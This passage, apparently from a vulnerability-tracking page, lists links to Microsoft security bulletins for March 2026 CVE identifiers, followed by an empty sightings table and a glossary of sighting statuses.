"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23269",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23269"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23298",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23298"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23304",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23304"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23370",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23370"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23100",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23100"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23271",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23271"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23352",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23352"
},
{
"published_at": "2026-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33343",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33343"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-4437",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-4437"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23343",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23343"
},
{
"published_at": "2026-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33413",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33413"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23246",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23246"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23279",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23279"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23244",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23244"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23367",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23367"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23307",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23307"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23398",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23398"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-69720",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-69720"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-28755",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-28755"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23300",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23300"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23381",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23381"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23356",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23356"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23351",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23351"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23277",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23277"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23315",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23315"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-4645",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-4645"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33526",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33526"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23382",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23382"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23310",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23310"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23306",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23306"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23336",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23336"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-2369",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-2369"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23391",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23391"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23290",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23290"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23312",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23312"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23388",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23388"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23390",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23390"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23303",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23303"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23289",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23289"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23293",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23293"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-27651",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27651"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23291",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23291"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-28753",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-28753"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23334",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23334"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32647",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32647"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23397",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23397"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23281",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23281"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23365",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23365"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23285",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23285"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23292",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23292"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23284",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23284"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23395",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23395"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23274",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23274"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23357",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23357"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.